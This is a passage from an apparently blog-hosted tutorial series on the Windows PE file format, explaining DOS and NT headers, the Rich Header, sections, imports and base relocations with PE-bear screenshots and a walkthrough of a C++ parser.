0x%X\n",PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS);printf("\n Data Directories:\n");printf("\n * Export Directory:\n");printf(" RVA: 0x%X\n",PEFILE_EXPORT_DIRECTORY.VirtualAddress);printf(" Size: 0x%X\n",PEFILE_EXPORT_DIRECTORY.Size);..[REDACTED]..printf("\n * COM Runtime Descriptor:\n");printf(" RVA: 0x%X\n",PEFILE_COM_DESCRIPTOR_DIRECTORY.VirtualAddress);printf(" Size: 0x%X\n",PEFILE_COM_DESCRIPTOR_DIRECTORY.Size);}
Parsing Section Headers
ParseSectionHeaders()
This function starts by assigning the PEFILE_SECTION_HEADERS class member to a pointer to an IMAGE_SECTION_HEADER array of the count of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS.
Then it goes into a loop of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS iterations where in each iteration it changes the file offset to (e_lfanew + size of NT Headers + loop counter multiplied by the size of a section header) to reach the beginning of the next Section Header, then it reads the new Section Header and assigns it to the next element of PEFILE_SECTION_HEADERS.
To parse out the Import Directory Table we need to determine the count of IMAGE_IMPORT_DESCRIPTORs first.
This function starts by resolving the file offset of the Import Directory, then it goes into a loop where in each loop it keeps reading the next import descriptor.
In each iteration it checks if the descriptor has zeroed out values, if that is the case then we’ve reached the end of the Import Directory, so it breaks.
Otherwise it increments _import_directory_count and the loop continues.
After finding the size of the Import Directory, the function assigns the PEFILE_IMPORT_TABLE class member to a pointer to an IMAGE_IMPORT_DESCRIPTOR array of the count of _import_directory_count then goes into another loop similar to the one we’ve seen in ParseSectionHeaders() to parse out the import descriptors.
After obtaining the import descriptors, further parsing is needed to retrieve information about the imported functions.
This is done by the PrintImportTableInfo() function.
This function iterates over the import descriptors, and for each descriptor it resolves the file offset of the DLL name, retrieves the DLL name then prints it, it also prints the ILT RVA, the IAT RVA and whether the import is bound or not.
After that it resolves the file offset of the ILT then it parses out each ILT entry.
If the Ordinal/Name flag is set it prints the function ordinal, otherwise it prints the function name, the hint RVA and the hint.
If the ILT entry is zeroed out, the loop breaks and the next import descriptor parsing iteration starts.
We’ve discussed the details about this in the PE imports post.
This function follows the same process we’ve seen in ParseImportDirectory().
It resolves the file offset of the Base Relocation Directory, then it loops over each relocation block until it reaches a zeroed out block. Then it parses out these blocks and saves each IMAGE_BASE_RELOCATION structure in PEFILE_BASERELOC_TABLE.
One thing to note here that is different from what we’ve seen in ParseImportDirectory() is that in addition to keeping a block counter we also keep a size counter that’s incremented by adding the value of SizeOfBlock of each block in each iteration.
We do this because relocation blocks don’t have a fixed size, and in order to correctly calculate the offset of the next relocation block we need the total size of the previous blocks.
This function iterates over the base relocation blocks, and for each block it resolves the file offset of the block, then it prints the block RVA, size and number of entries (calculated by subtracting the size of IMAGE_BASE_RELOCATION from the block size then dividing that by the size of a WORD).
After that it iterates over the relocation entries and prints the relocation value, and from that value it separates the type and the offset and prints each one of them.
I hope that seeing actual code has given you a better understanding of what we’ve discussed throughout the previous posts.
I believe that there are better ways for implementation than the ones I have presented, I’m in no way a c++ programmer and I know that there’s always room for improvement, so feel free to reach out to me, any feedback would be much appreciated.
A dive into the PE file format - PE file structure - Part 6: PE Base Relocations
Introduction
In this post we’re going to talk about PE base relocations.
We’re going to discuss what relocations are, then we’ll take a look at the relocation table.
Relocations
When a program is compiled, the compiler assumes that the executable is going to be loaded at a certain base address, that address is saved in IMAGE_OPTIONAL_HEADER.ImageBase, some addresses get calculated then hardcoded within the executable based on the base address.
However for a variety of reasons, it’s not very likely that the executable is going to get its desired base address, it will get loaded in another base address and that will make all of the hardcoded addresses invalid.
A list of all hardcoded values that will need fixing if the image is loaded at a different base address is saved in a special table called the Relocation Table (a Data Directory within the .reloc section).
The process of relocating (done by the loader) is what fixes these values.
Let’s take an example, the following code defines an int variable and a pointer to that variable:
inttest=2;int*testPtr=&test;
During compile-time, the compiler will assume a base address, let’s say it assumes a base address of 0x1000, it decides that test will be located at an offset of 0x100 and based on that it gives testPtr a value of 0x1100.
Later on, a user runs the program and the image gets loaded into memory.
It gets a base address of 0x2000, this means that the hardcoded value of testPtr will be invalid, the loader fixes that value by adding the difference between the assumed base address and the actual base address, in this case it’s a difference of 0x1000 (0x2000 - 0x1000), so the new value of testPtr will be 0x2100 (0x1100 + 0x1000) which is the correct new address of test.
Relocation Table
As described by Microsoft documentation, the base relocation table contains entries for all base relocations in the image.
It’s a Data Directory located within the .reloc section, it’s divided into blocks, each block represents the base relocations for a 4K page and each block must start on a 32-bit boundary.
Each block starts with an IMAGE_BASE_RELOCATION structure followed by any number of offset field entries.
The IMAGE_BASE_RELOCATION structure specifies the page RVA, and the size of the relocation block.
Each offset field entry is a WORD, first 4 bits of it define the relocation type (check Microsoft documentation for a list of relocation types), the last 12 bits store an offset from the RVA specified in the IMAGE_BASE_RELOCATION structure at the start of the relocation block.
Each relocation entry gets processed by adding the RVA of the page to the image base address, then by adding the offset specified in the relocation entry, an absolute address of the location that needs fixing can be obtained.
The PE file I’m looking at contains only one relocation block, its size is 0x28 bytes:
We know that each block starts with an 8-byte-long structure, meaning that the size of the entries is 0x20 bytes (32 bytes), each entry’s size is 2 bytes so the total number of entries should be 16.
A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)
Introduction
In this post we’re going to talk about a very important aspect of PE files, the PE imports.
To understand how PE files handle their imports, we’ll go over some of the Data Directories present in the Import Data section (.idata), the Import Directory Table, the Import Lookup Table (ILT) or also referred to as the Import Name Table (INT) and the Import Address Table (IAT).
Import Directory Table
The Import Directory Table is a Data Directory located at the beginning of the .idata section.
It consists of an array of IMAGE_IMPORT_DESCRIPTOR structures, each one of them is for a DLL.
It doesn’t have a fixed size, so the last IMAGE_IMPORT_DESCRIPTOR of the array is zeroed-out (NULL-Padded) to indicate the end of the Import Directory Table.
TimeDateStamp: A time date stamp, that’s initially set to 0 if not bound and set to -1 if bound.
In case of an unbound import the time date stamp gets updated to the time date stamp of the DLL after the image is bound.
In case of a bound import it stays set to -1 and the real time date stamp of the DLL can be found in the Bound Import Directory Table in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR .
We’ll discuss bound imports in the next section.
ForwarderChain: The index of the first forwarder chain reference.
This is something responsible for DLL forwarding. (DLL forwarding is when a DLL forwards some of its exported functions to another DLL.)
Name: An RVA of an ASCII string that contains the name of the imported DLL.
FirstThunk: RVA of the IAT.
Bound Imports
A bound import essentially means that the import table contains fixed addresses for the imported functions.
These addresses are calculated and written during compile time by the linker.
Using bound imports is a speed optimization, it reduces the time needed by the loader to resolve function addresses and fill the IAT, however if at run-time the bound addresses do not match the real ones then the loader will have to resolve these addresses again and fix the IAT.
When discussing IMAGE_IMPORT_DESCRIPTOR.TimeDateStamp, I mentioned that in case of a bound import, the time date stamp is set to -1 and the real time date stamp of the DLL can be found in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR in the Bound Import Data Directory.
Bound Import Data Directory
The Bound Import Data Directory is similar to the Import Directory Table, however as the name suggests, it holds information about the bound imports.
It consists of an array of IMAGE_BOUND_IMPORT_DESCRIPTOR structures, and ends with a zeroed-out IMAGE_BOUND_IMPORT_DESCRIPTOR.
IMAGE_BOUND_IMPORT_DESCRIPTOR is defined as follows:
typedefstruct_IMAGE_BOUND_IMPORT_DESCRIPTOR{DWORDTimeDateStamp;WORDOffsetModuleName;WORDNumberOfModuleForwarderRefs;// Array of zero or more IMAGE_BOUND_FORWARDER_REF follows}IMAGE_BOUND_IMPORT_DESCRIPTOR,*PIMAGE_BOUND_IMPORT_DESCRIPTOR;
TimeDateStamp: The time date stamp of the imported DLL.
OffsetModuleName: An offset to a string with the name of the imported DLL.
It’s an offset from the first IMAGE_BOUND_IMPORT_DESCRIPTOR
NumberOfModuleForwarderRefs: The number of the IMAGE_BOUND_FORWARDER_REF structures that immediately follow this structure.
IMAGE_BOUND_FORWARDER_REF is a structure that’s identical to IMAGE_BOUND_IMPORT_DESCRIPTOR, the only difference is that the last member is reserved.
That’s all we need to know about bound imports.
Import Lookup Table (ILT)
Sometimes people refer to it as the Import Name Table (INT).
Every imported DLL has an Import Lookup Table.
IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk holds the RVA of the ILT of the corresponding DLL.
The ILT is essentially a table of names or references, it tells the loader which functions are needed from the imported DLL.
The ILT consists of an array of 32-bit numbers (for PE32) or 64-bit numbers for (PE32+), the last one is zeroed-out to indicate the end of the ILT.
Each entry of these entries encodes information as follows:
Bit 31/63 (most significant bit): This is called the Ordinal/Name flag, it specifies whether to import the function by name or by ordinal.
Bits 15-0: If the Ordinal/Name flag is set to 1 these bits are used to hold the 16-bit ordinal number that will be used to import the function, bits 30-15/62-15 for PE32/PE32+ must be set to 0.
Bits 30-0: If the Ordinal/Name flag is set to 0 these bits are used to hold an RVA of a Hint/Name table.
Hint/Name Table
A Hint/Name table is a structure defined in winnt.h as IMAGE_IMPORT_BY_NAME:
Hint: A word that contains a number, this number is used to look-up the function, that number is first used as an index into the export name pointer table, if that initial check fails a binary search is performed on the DLL’s export name pointer table.
Name: A null-terminated string that contains the name of the function to import.
Import Address Table (IAT)
On disk, the IAT is identical to the ILT, however during bounding when the binary is being loaded into memory, the entries of the IAT get overwritten with the addresses of the functions that are being imported.
Summary
So to summarize what we discussed in this post, for every DLL the executable is loading functions from, there will be an IMAGE_IMPORT_DESCRIPTOR within the Image Directory Table.
The IMAGE_IMPORT_DESCRIPTOR will contain the name of the DLL, and two fields holding RVAs of the ILT and the IAT.
The ILT will contain references for all the functions that are being imported from the DLL.
The IAT will be identical to the ILT until the executable is loaded in memory, then the loader will fill the IAT with the actual addresses of the imported functions.
If the DLL import is a bound import, then the import information will be contained in IMAGE_BOUND_IMPORT_DESCRIPTOR structures in a separate Data Directory called the Bound Import Data Directory.
Let’s take a quick look at the import information inside of an actual PE file.
Here’s the Import Directory Table of the executable:
All of these entries are IMAGE_IMPORT_DESCRIPTORs.
As you can see, the TimeDateStamp of all the imports is set to 0, meaning that none of these imports are bound, this is also confirmed in the Bound? column added by PE-bear.
For example, if we take USER32.dll and follow the RVA of its ILT (referenced by OriginalFirstThunk), we’ll find only 1 entry (because only one function is imported), and that entry looks like this:
This is a 64-bit executable, so the entry is 64 bits long.
As you can see, the last byte is set to 0, indicating that a Hint/Table name should be used to look-up the function.
We know that the RVA of this Hint/Table name should be referenced by the first 2 bytes, so we should follow RVA 0x29F8:
Now we’re looking at an IMAGE_IMPORT_BY_NAME structure, first two bytes hold the hint, which in this case is 0x283, the rest of the structure holds the full name of the function which is MessageBoxA.
We can verify that our interpretation of the data is correct by looking at how PE-bear parsed it, and we’ll see the same results:
Conclusion
That’s all I have to say about PE imports, in the next post I’ll discuss PE base relocations.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections
Introduction
In the last post we talked about the NT Headers and we skipped the last part of the Optional Header which was the data directories.
In this post we’re going to talk about what data directories are and where they are located.
We’re also going to cover section headers and sections in this post.
Data Directories
The last member of the IMAGE_OPTIONAL_HEADER structure was an array of IMAGE_DATA_DIRECTORY structures defined as follows:
It’s a very simple structure with only two members, first one being an RVA pointing to the start of the Data Directory and the second one being the size of the Data Directory.
So what is a Data Directory? Basically a Data Directory is a piece of data located within one of the sections of the PE file.
Data Directories contain useful information needed by the loader, an example of a very important directory is the Import Directory which contains a list of external functions imported from other libraries, we’ll discuss it in more detail when we go over PE imports.
Please note that not all Data Directories have the same structure, the IMAGE_DATA_DIRECTORY.VirtualAddress points to the Data Directory, however the type of that directory is what determines how that chunk of data is going to be parsed.
Here’s a list of Data Directories defined in winnt.h. (Each one of these values represents an index in the DataDirectory array):
If we take a look at the contents of IMAGE_OPTIONAL_HEADER.DataDirectory of an actual PE file, we might see entries where both fields are set to 0:
This means that this specific Data Directory is not used (doesn’t exist) in the executable file.
Sections and Section Headers
Sections
Sections are the containers of the actual data of the executable file, they occupy the rest of the PE file after the headers, precisely after the section headers.
Some sections have special names that indicate their purpose, we’ll go over some of them, and a full list of these names can be found on the official Microsoft documentation under the “Special Sections” section.
.text: Contains the executable code of the program.
.data: Contains the initialized data.
.bss: Contains uninitialized data.
.rdata: Contains read-only initialized data.
.edata: Contains the export tables.
.idata: Contains the import tables.
.reloc: Contains image relocation information.
.rsrc: Contains resources used by the program, these include images, icons or even embedded binaries.
.tls: (Thread Local Storage), provides storage for every executing thread of the program.
Section Headers
After the Optional Header and before the sections comes the Section Headers.
These headers contain information about the sections of the PE file.
A Section Header is a structure named IMAGE_SECTION_HEADER defined in winnt.h as follows:
Name: First field of the Section Header, a byte array of the size IMAGE_SIZEOF_SHORT_NAME that holds the name of the section.
IMAGE_SIZEOF_SHORT_NAME has the value of 8 meaning that a section name can’t be longer than 8 characters.
For longer names the official documentation mentions a work-around by filling this field with an offset in the string table, however executable images do not use a string table so this limitation of 8 characters holds for executable images.
PhysicalAddress or VirtualSize: A union defines multiple names for the same thing, this field contains the total size of the section when it’s loaded in memory.
VirtualAddress: The documentation states that for executable images this field holds the address of the first byte of the section relative to the image base when loaded in memory, and for object files it holds the address of the first byte of the section before relocation is applied.
SizeOfRawData: This field contains the size of the section on disk, it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
SizeOfRawData and VirtualSize can be different, we’ll discuss the reason for this later in the post.
PointerToRawData: A pointer to the first page of the section within the file, for executable images it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
PointerToRelocations: A file pointer to the beginning of relocation entries for the section. It’s set to 0 for executable files.
PointerToLineNumbers: A file pointer to the beginning of COFF line-number entries for the section. It’s set to 0 because COFF debugging information is deprecated.
NumberOfRelocations: The number of relocation entries for the section, it’s set to 0 for executable images.
NumberOfLinenumbers: The number of COFF line-number entries for the section, it’s set to 0 because COFF debugging information is deprecated.
Characteristics: Flags that describe the characteristics of the section.
These characteristics are things like if the section contains executable code, contains initialized/uninitialized data, can be shared in memory.
A complete list of section characteristics flags can be found on the official Microsoft documentation.
SizeOfRawData and VirtualSize can be different, and this can happen for multiple of reasons.
SizeOfRawData must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment, so if the section size is less than that value the rest gets padded and SizeOfRawData gets rounded to the nearest multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
However when the section is loaded into memory it doesn’t follow that alignment and only the actual size of the section is occupied.
In this case SizeOfRawData will be greater than VirtualSize
The opposite can happen as well.
If the section contains uninitialized data, these data won’t be accounted for on disk, but when the section gets mapped into memory, the section will expand to reserve memory space for when the uninitialized data gets later initialized and used.
This means that the section on disk will occupy less than it will do in memory, in this case VirtualSize will be greater than SizeOfRawData.
Here’s the view of Section Headers in PE-bear:
We can see Raw Addr. and Virtual Addr. fields which correspond to IMAGE_SECTION_HEADER.PointerToRawData and IMAGE_SECTION_HEADER.VirtualAddress.
Raw Size and Virtual Size correspond to IMAGE_SECTION_HEADER.SizeOfRawData and IMAGE_SECTION_HEADER.VirtualSize.
We can see how these two fields are used to calculate where the section ends, both on disk and in memory.
For example if we take the .text section, it has a raw address of 0x400 and a raw size of 0xE00, if we add them together we get 0x1200 which is displayed as the section end on disk.
Similarly we can do the same with virtual size and address, virtual address is 0x1000 and virtual size is 0xD2C, if we add them together we get 0x1D2C.
The Characteristics field marks some sections as read-only, some other sections as read-write and some sections as readable and executable.
PointerToRelocations, NumberOfRelocations and NumberOfLinenumbers are set to 0 as expected.
Conclusion
That’s it for this post, we’ve discussed what Data Directories are and we talked about sections.
The next post will be about PE imports.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 3: NT Headers
Introduction
In the previous post we looked at the structure of the DOS header and we reversed the DOS stub.
In this post we’re going to talk about the NT Headers part of the PE file structure.
Before we get into the post, we need to talk about an important concept that we’re going to see a lot, and that is the concept of a Relative Virtual Address or an RVA.
An RVA is just an offset from where the image was loaded in memory (the Image Base). So to translate an RVA into an absolute virtual address you need to add the value of the RVA to the value of the Image Base.
PE files rely heavily on the use of RVAs as we’ll see later.
NT Headers (IMAGE_NT_HEADERS)
NT headers is a structure defined in winnt.h as IMAGE_NT_HEADERS, by looking at its definition we can see that it has three members, a DWORD signature, an IMAGE_FILE_HEADER structure called FileHeader and an IMAGE_OPTIONAL_HEADER structure called OptionalHeader.
It’s worth mentioning that this structure is defined in two different versions, one for 32-bit executables (Also named PE32 executables) named IMAGE_NT_HEADERS and one for 64-bit executables (Also named PE32+ executables) named IMAGE_NT_HEADERS64.
The main difference between the two versions is the used version of IMAGE_OPTIONAL_HEADER structure which has two versions, IMAGE_OPTIONAL_HEADER32 for 32-bit executables and IMAGE_OPTIONAL_HEADER64 for 64-bit executables.
First member of the NT headers structure is the PE signature, it’s a DWORD which means that it occupies 4 bytes.
It always has a fixed value of 0x50450000 which translates to PE\0\0 in ASCII.
Here’s a screenshot from PE-bear showing the PE signature:
File Header (IMAGE_FILE_HEADER)
Also called “The COFF File Header”, the File Header is a structure that holds some information about the PE file.
It’s defined as IMAGE_FILE_HEADER in winnt.h, here’s the definition:
Machine: This is a number that indicates the type of machine (CPU Architecture) the executable is targeting, this field can have a lot of values, but we’re only interested in two of them, 0x8864 for AMD64 and 0x14c for i386. For a complete list of possible values you can check the official Microsoft documentation.
NumberOfSections: This field holds the number of sections (or the number of section headers aka. the size of the section table.).
TimeDateStamp: A unix timestamp that indicates when the file was created.
PointerToSymbolTable and NumberOfSymbols: These two fields hold the file offset to the COFF symbol table and the number of entries in that symbol table, however they get set to 0 which means that no COFF symbol table is present, this is done because the COFF debugging information is deprecated.
SizeOfOptionalHeader: The size of the Optional Header.
Characteristics: A flag that indicates the attributes of the file, these attributes can be things like the file being executable, the file being a system file and not a user program, and a lot of other things. A complete list of these flags can be found on the official Microsoft documentation.
Here’s the File Header contents of an actual PE file:
Optional Header (IMAGE_OPTIONAL_HEADER)
The Optional Header is the most important header of the NT headers, the PE loader looks for specific information provided by that header to be able to load and run the executable.
It’s called the optional header because some file types like object files don’t have it, however this header is essential for image files.
It doesn’t have a fixed size, that’s why the IMAGE_FILE_HEADER.SizeOfOptionalHeader member exists.
The first 8 members of the Optional Header structure are standard for every implementation of the COFF file format, the rest of the header is an extension to the standard COFF optional header defined by Microsoft, these additional members of the structure are needed by the Windows PE loader and linker.
As mentioned earlier, there are two versions of the Optional Header, one for 32-bit executables and one for 64-bit executables.
The two versions are different in two aspects:
The size of the structure itself (or the number of members defined within the structure):IMAGE_OPTIONAL_HEADER32 has 31 members while IMAGE_OPTIONAL_HEADER64 only has 30 members, that additional member in the 32-bit version is a DWORD named BaseOfData which holds an RVA of the beginning of the data section.
The data type of some of the members: The following 5 members of the Optional Header structure are defined as DWORD in the 32-bit version and as ULONGLONG in the 64-bit version:
ImageBase
SizeOfStackReserve
SizeOfStackCommit
SizeOfHeapReserve
SizeOfHeapCommit
Let’s take a look at the definition of both structures.
typedefstruct_IMAGE_OPTIONAL_HEADER{//// Standard fields.//WORDMagic;BYTEMajorLinkerVersion;BYTEMinorLinkerVersion;DWORDSizeOfCode;DWORDSizeOfInitializedData;DWORDSizeOfUninitializedData;DWORDAddressOfEntryPoint;DWORDBaseOfCode;DWORDBaseOfData;//// NT additional fields.//DWORDImageBase;DWORDSectionAlignment;DWORDFileAlignment;WORDMajorOperatingSystemVersion;WORDMinorOperatingSystemVersion;WORDMajorImageVersion;WORDMinorImageVersion;WORDMajorSubsystemVersion;WORDMinorSubsystemVersion;DWORDWin32VersionValue;DWORDSizeOfImage;DWORDSizeOfHeaders;DWORDCheckSum;WORDSubsystem;WORDDllCharacteristics;DWORDSizeOfStackReserve;DWORDSizeOfStackCommit;DWORDSizeOfHeapReserve;DWORDSizeOfHeapCommit;DWORDLoaderFlags;DWORDNumberOfRvaAndSizes;IMAGE_DATA_DIRECTORYDataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];}IMAGE_OPTIONAL_HEADER32,*PIMAGE_OPTIONAL_HEADER32;
Magic: Microsoft documentation describes this field as an integer that identifies the state of the image, the documentation mentions three common values:
0x10B: Identifies the image as a PE32 executable.
0x20B: Identifies the image as a PE32+ executable.
0x107: Identifies the image as a ROM image.
The value of this field is what determines whether the executable is 32-bit or 64-bit, IMAGE_FILE_HEADER.Machine is ignored by the Windows PE loader.
MajorLinkerVersion and MinorLinkerVersion: The linker major and minor version numbers.
SizeOfCode: This field holds the size of the code (.text) section, or the sum of all code sections if there are multiple sections.
SizeOfInitializedData: This field holds the size of the initialized data (.data) section, or the sum of all initialized data sections if there are multiple sections.
SizeOfUninitializedData: This field holds the size of the uninitialized data (.bss) section, or the sum of all uninitialized data sections if there are multiple sections.
AddressOfEntryPoint: An RVA of the entry point when the file is loaded into memory.
The documentation states that for program images this relative address points to the starting address and for device drivers it points to initialization function. For DLLs an entry point is optional, and in the case of entry point absence the AddressOfEntryPoint field is set to 0.
BaseOfCode: An RVA of the start of the code section when the file is loaded into memory.
BaseOfData (PE32 Only): An RVA of the start of the data section when the file is loaded into memory.
ImageBase: This field holds the preferred address of the first byte of image when loaded into memory (the preferred base address), this value must be a multiple of 64K.
Due to memory protections like ASLR, and a lot of other reasons, the address specified by this field is almost never used, in this case the PE loader chooses an unused memory range to load the image into, after loading the image into that address the loader goes into a process called the relocating where it fixes the constant addresses within the image to work with the new image base, there’s a special section that holds information about places that will need fixing if relocation is needed, that section is called the relocation section (.reloc), more on that in the upcoming posts.
SectionAlignment: This field holds a value that gets used for section alignment in memory (in bytes), sections are aligned in memory boundaries that are multiples of this value.
The documentation states that this value defaults to the page size for the architecture and it can’t be less than the value of FileAlignment.
FileAlignment: Similar to SectionAligment this field holds a value that gets used for section raw data alignment on disk (in bytes), if the size of the actual data in a section is less than the FileAlignment value, the rest of the chunk gets padded with zeroes to keep the alignment boundaries.
The documentation states that this value should be a power of 2 between 512 and 64K, and if the value of SectionAlignment is less than the architecture’s page size then the sizes of FileAlignment and SectionAlignment must match.
MajorOperatingSystemVersion, MinorOperatingSystemVersion, MajorImageVersion, MinorImageVersion, MajorSubsystemVersion and MinorSubsystemVersion: These members of the structure specify the major version number of the required operating system, the minor version number of the required operating system, the major version number of the image, the minor version number of the image, the major version number of the subsystem and the minor version number of the subsystem respectively.
Win32VersionValue: A reserved field that the documentation says should be set to 0.
SizeOfImage: The size of the image file (in bytes), including all headers. It gets rounded up to a multiple of SectionAlignment because this value is used when loading the image into memory.
SizeOfHeaders: The combined size of the DOS stub, PE header (NT Headers), and section headers rounded up to a multiple of FileAlignment.
CheckSum: A checksum of the image file, it’s used to validate the image at load time.
Subsystem: This field specifies the Windows subsystem (if any) that is required to run the image, A complete list of the possible values of this field can be found on the official Microsoft documentation.
DLLCharacteristics: This field defines some characteristics of the executable image file, like if it’s NX compatible and if it can be relocated at run time.
I have no idea why it’s named DLLCharacteristics, it exists within normal executable image files and it defines characteristics that can apply to normal executable files.
A complete list of the possible flags for DLLCharacteristics can be found on the official Microsoft documentation.
SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit: These fields specify the size of the stack to reserve, the size of the stack to commit, the size of the local heap space to reserve and the size of the local heap space to commit respectively.
LoaderFlags: A reserved field that the documentation says should be set to 0.
NumberOfRvaAndSizes : Size of the DataDirectory array.
DataDirectory: An array of IMAGE_DATA_DIRECTORY structures. We will talk about this in the next post.
Let’s take a look at the Optional Header contents of an actual PE file.
We can talk about some of these fields, first one being the Magic field at the start of the header, it has the value 0x20B meaning that this is a PE32+ executable.
We can see that the entry point RVA is 0x12C4 and the code section start RVA is 0x1000, it follows the alignment defined by the SectionAlignment field which has the value of 0x1000.
File alignment is set to 0x200, and we can verify this by looking at any of the sections, for example the data section:
As you can see, the actual contents of the data section are from 0x2200 to 0x2229, however the rest of the section is padded until 0x23FF to comply with the alignment defined by FileAlignment.
SizeOfImage is set to 7000 and SizeOfHeaders is set to 400, both are multiples of SectionAlignment and FileAlignment respectively.
The Subsystem field is set to 3 which is the Windows console, and that makes sense because the program is a console application.
I didn’t include the DataDirectory in the optional header contents screenshot because we still haven’t talked about it yet.
Conclusion
We’ve reached the end of this post. In summary we looked at the NT Headers structure, and we discussed the File Header and Optional Header structures in detail.
In the next post we will take a look at the Data Directories, the Section Headers, and the sections.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header
Introduction
In the previous post we looked at a high level overview of the PE file structure, in this post we’re going to talk about the first two parts which are the DOS Header and the DOS Stub.
The PE viewer I’m going to use throughout the series is called PE-bear, it’s full of features and has a good UI.
DOS Header
Overview
The DOS header (also called the MS-DOS header) is a 64-byte-long structure that exists at the start of the PE file.
it’s not important for the functionality of PE files on modern Windows systems, however it’s there because of backward compatibility reasons.
This header makes the file an MS-DOS executable, so when it’s loaded on MS-DOS the DOS stub gets executed instead of the actual program.
Without this header, if you attempt to load the executable on MS-DOS it will not be loaded and will just produce a generic error.
Structure
As mentioned before, it’s a 64-byte-long structure, we can take a look at the contents of that structure by looking at the IMAGE_DOS_HEADER structure definition from winnt.h:
typedefstruct_IMAGE_DOS_HEADER{// DOS .EXE headerWORDe_magic;// Magic numberWORDe_cblp;// Bytes on last page of fileWORDe_cp;// Pages in fileWORDe_crlc;// RelocationsWORDe_cparhdr;// Size of header in paragraphsWORDe_minalloc;// Minimum extra paragraphs neededWORDe_maxalloc;// Maximum extra paragraphs neededWORDe_ss;// Initial (relative) SS valueWORDe_sp;// Initial SP valueWORDe_csum;// ChecksumWORDe_ip;// Initial IP valueWORDe_cs;// Initial (relative) CS valueWORDe_lfarlc;// File address of relocation tableWORDe_ovno;// Overlay numberWORDe_res[4];// Reserved wordsWORDe_oemid;// OEM identifier (for e_oeminfo)WORDe_oeminfo;// OEM information; e_oemid specificWORDe_res2[10];// Reserved wordsLONGe_lfanew;// File address of new exe header}IMAGE_DOS_HEADER,*PIMAGE_DOS_HEADER;
This structure is important to the PE loader on MS-DOS, however only a few members of it are important to the PE loader on Windows Systems, so we’re not going to cover everything in here, just the important members of the structure.
e_magic: This is the first member of the DOS Header, it’s a WORD so it occupies 2 bytes, it’s usually called the magic number.
It has a fixed value of 0x5A4D or MZ in ASCII, and it serves as a signature that marks the file as an MS-DOS executable.
e_lfanew: This is the last member of the DOS header structure, it’s located at offset 0x3C into the DOS header and it holds an offset to the start of the NT headers.
This member is important to the PE loader on Windows systems because it tells the loader where to look for the file header.
The following picture shows contents of the DOS header in an actual PE file using PE-bear:
As you can see, the first member of the header is the magic number with the fixed value we talked about which was 5A4D.
The last member of the header (at offset 0x3C) is given the name “File address of new exe header”, it has the value 100, we can follow to that offset and we’ll find the start of the NT headers as expected:
DOS Stub
Overview
The DOS stub is an MS-DOS program that prints an error message saying that the executable is not compatible with DOS then exits.
This is what gets executed when the program is loaded in MS-DOS, the default error message is “This program cannot be run in DOS mode.”, however this message can be changed by the user during compile time.
That’s all we need to know about the DOS stub, we don’t really care about it, but let’s take a look at what it’s doing just for fun.
Analysis
To be able to disassemble the machine code of the DOS stub, I copied the code of the stub from PE-bear, then I created a new file with the stub contents using a hex editor (HxD) and gave it the name dos-stub.exe.
Stub code:
0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00
After that I used IDA to disassemble the executable, MS-DOS programs are 16-bit programs, so I chose the intel 8086 processor type and the 16-bit disassembly mode.
It’s a fairly simple program, let’s step through it line by line:
seg000:0000 push cs
seg000:0001 pop ds
First line pushes the value of cs onto the stack and the second line pops that value from the top of stack into ds. This is just a way of setting the value of the data segment to the same value as the code segment.
seg000:0002 mov dx, 0Eh
seg000:0005 mov ah, 9
seg000:0007 int 21h ; DOS - PRINT STRING
seg000:0007 ; DS:DX -> string terminated by "$"
These three lines are responsible for printing the error message, first line sets dx to the address of the string “This program cannot be run in DOS mode.” (0xe), second line sets ah to 9 and the last line invokes interrupt 21h.
Interrupt 21h is a DOS interrupt (API call) that can do a lot of things, it takes a parameter that determines what function to execute and that parameter is passed in the ah register.
We see here that the value 9 is given to the interrupt, 9 is the code of the function that prints a string to the screen, that function takes a parameter which is the address of the string to print, that parameter is passed in the dx register as we can see in the code.
Information about the DOS API can be found on wikipedia.
seg000:0009 mov ax, 4C01h
seg000:000C int 21h ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
seg000:000C ; AL = exit code
The last three lines of the program are again an interrupt 21h call, this time there’s a mov instruction that puts 0X4C01 into ax, this sets al to 0x01 and ah to 0x4c.
0x4c is the function code of the function that exits with an error code, it takes the error code from al, which in this case is 1.
So in summary, all the DOS stub is doing is print the error message then exit with code 1.
Rich Header
So now we’ve seen the DOS Header and the DOS Stub, however there’s still a chunk of data we haven’t talked about lying between the DOS Stub and the start of the NT Headers.
This chunk of data is commonly referred to as the Rich Header, it’s an undocumented structure that’s only present in executables built using the Microsoft Visual Studio toolset.
This structure holds some metadata about the tools used to build the executable like their names or types and their specific versions and build numbers.
All of the resources I have read about PE files didn’t mention this structure, however when searching about the Rich Header itself I found a decent amount of resources, and that makes sense because the Rich Header is not actually a part of the PE file format structure and can be completely zeroed-out without interfering with the executable’s functionality, it’s just something that Microsoft adds to any executable built using their Visual Studio toolset.
I only know about the Rich Header because I’ve read the reports on the Olympic Destroyer malware, and for those who don’t know what Olympic Destroyer is, it’s a malware that was written and used by a threat group in an attempt to disrupt the 2018 Winter Olympics.
This piece of malware is known for having a lot of false flags that were intentionally put to cause confusion and misattribution, one of the false flags present there was a Rich Header.
